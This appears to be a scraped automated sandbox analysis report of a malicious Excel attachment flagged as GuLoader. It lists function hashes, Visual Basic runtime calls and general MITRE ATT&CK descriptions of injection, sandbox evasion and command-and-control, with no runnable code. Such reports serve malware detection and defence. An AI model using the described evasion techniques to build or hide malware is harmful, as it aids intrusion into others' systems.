API ID: __vba$CheckFreeHresultNew2
String ID: `S_
API String ID: 1645334062-3721679040
Opcode ID: 31a3ac76d4c5d702b274ae540c102f50db41a1540cb756a18691436ad4936f5b
Instruction ID: e6124f0ace62f3f41fc6db8c97291a5c9a7b2bb54052bc93b1f63bd177861b1f
Opcode Fuzzy Hash: 31a3ac76d4c5d702b274ae540c102f50db41a1540cb756a18691436ad4936f5b
Instruction Fuzzy Hash: 13219FB1D00608AFCB04EFA9C945A9EBBB9EF09700F10842AF951FB2A1C77959058F95

Uniqueness

Uniqueness Score: -1.00%

Function 00435E35, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`S_,?,?,?,?,?,?,?,?,004012D6), ref: 00435E85
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004012D6), ref: 00435E9D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,000001C0,?,?,?,?,?,?,?,?,004012D6), ref: 00435EBF
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004012D6), ref: 00435EC7

Strings

`S_, xrefs: 00435E6C, 00435E7B, 00435E8A

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: `S_
API String ID: 1645334062-3721679040
Opcode ID: 46319103c04b378e960fc955cb90203a18b82ee3334d76c26b07d8faefe8ab90
Instruction ID: fbe9987e652e3cd95587eb4bb66624989f3f04d94c91e188d19f879de34bdb93
Opcode Fuzzy Hash: 46319103c04b378e960fc955cb90203a18b82ee3334d76c26b07d8faefe8ab90
Instruction Fuzzy Hash: 6E1182B4940604ABC710EF96C94AF9EBBBCFF58704F20546BF455E72A1C77C99018B98

Uniqueness

Uniqueness Score: -1.00%

Function 004359B8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00435A08
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00435A20
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,000001D4), ref: 00435A42
__vbaFreeObj.MSVBVM60 ref: 00435A4A

Strings

`S_, xrefs: 004359F1, 004359FE, 00435A0D

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: `S_
API String ID: 1645334062-3721679040
Opcode ID: 5a4ebd55e1a7cecab3bdea2abc723d11c024616357b2a97d59688bd8449cc207
Instruction ID: feb1c320441b9c756de60183dab80e48393f8c49a4c19eaccdb74a3a427bc2c7
Opcode Fuzzy Hash: 5a4ebd55e1a7cecab3bdea2abc723d11c024616357b2a97d59688bd8449cc207
Instruction Fuzzy Hash: 0611C4B4500208ABC710FFA5C98AF9B7BBCBF08748F10546AF441F72A2D77C99059B99

Uniqueness

Uniqueness Score: -1.00%

Function 00435F0B, Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

__vbaLenBstrB.MSVBVM60(00432F6C,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435F4D
__vbaNew2.MSVBVM60(00432E4C,0043746C,00432F6C,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435F69
__vbaObjSetAddref.MSVBVM60(?,00401260,00432F6C,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435F7E
__vbaHresultCheckObj.MSVBVM60(00000000,0026F6F4,00432E3C,00000010,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435F9A
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004012D6), ref: 00435FA2

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$AddrefBstrCheckFreeHresultNew2
String ID:
API String ID: 2151688750-0
Opcode ID: 12fbce1b6afda02874adb90daf74c81a4200553edfb13b1a4c6868db8bfb9fdf
Instruction ID: f088a1b97714f96a277f254c758952f17696a8f35fa282824895934c35169a81
Opcode Fuzzy Hash: 12fbce1b6afda02874adb90daf74c81a4200553edfb13b1a4c6868db8bfb9fdf
Instruction Fuzzy Hash: 51115170900608ABC710AF95C986E9FBBB8BF08704F60906FF505F32A1D37C65458F59

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report MTIR21487610_0062180102_20210714081247.PDF.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "MTIR21487610_0062180102_20210714081247.PDF.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General